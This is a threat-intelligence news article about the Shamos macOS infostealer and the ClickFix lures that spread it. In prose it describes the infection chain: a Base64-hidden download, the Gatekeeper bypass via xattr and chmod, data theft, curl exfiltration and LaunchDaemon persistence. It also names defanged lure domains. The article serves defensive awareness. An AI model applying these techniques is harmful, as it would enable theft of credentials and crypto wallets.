A new infostealer malware named ‘Shamos’ is actively targeting Mac devices through deceptive “ClickFix” attacks that mimic troubleshooting guides and software fixes. This malware was identified as a variant of the Atomic macOS Stealer (AMOS).
Shamos is designed to steal sensitive data and credentials stored within web browsers, Keychain items, Apple Notes, and cryptocurrency wallets. The malware was developed by the cybercriminal group known as “COOKIE SPIDER.” CrowdStrike has detected Shamos and reports attempted infections across more than 300 environments they monitor globally, starting in June 2025.
The malware is disseminated through ClickFix attacks, often involving malvertising or fake GitHub repositories that trick users into executing shell commands within the macOS Terminal. These attacks lure victims by prompting them to run commands under the guise of installing software or resolving fictitious errors.
Executing these commands results in the download and execution of Shamos on the targeted device. The deceptive ads or spoofed pages, such as “mac-safer[.]com” and “rescue-mac[.]com,” claim to offer solutions to common macOS problems, enticing users to copy and paste provided commands to purportedly fix the issues.
Instead of providing any genuine fix, the command decodes a Base64-encoded URL and fetches a malicious Bash script from a remote server. This script captures the user’s password, downloads the Shamos mach-O executable, and prepares and executes the malware using ‘xattr’ (to remove the quarantine flag) and ‘chmod’ (to make the binary executable), effectively bypassing Gatekeeper security measures.
Once executed, Shamos initiates anti-VM commands to detect sandbox environments and then uses AppleScript commands for host reconnaissance and data collection. The malware searches for cryptocurrency wallet files, keychain data, Apple Notes data, and browser-stored information.
After gathering the data, Shamos packages it into an archive named ‘out.zip’ and transmits it to the attacker using curl. If Shamos is executed with sudo privileges, it creates a Plist file (com.finder.helper.plist) and stores it in the user’s LaunchDaemons directory to ensure persistence through automatic execution upon system startup.
CrowdStrike also observed that Shamos can download additional payloads into the victim’s home directory, including a spoofed Ledger Live wallet app and a botnet module. macOS users are strongly advised against executing commands found online unless they fully understand their function.
Similarly, caution should be exercised with GitHub repositories, as malicious projects are often hosted there, aiming to infect unsuspecting users. When encountering issues with macOS, users should avoid sponsored search results and instead seek assistance from official Apple Community forums or the system’s built-in Help feature.
ClickFix attacks have become increasingly prevalent for malware distribution, with threat actors employing them in TikTok videos, disguising them as captchas, or posing as fixes for fake Google Meet errors. This tactic has proven highly effective and has been utilized in ransomware attacks and by state-sponsored threat actors.
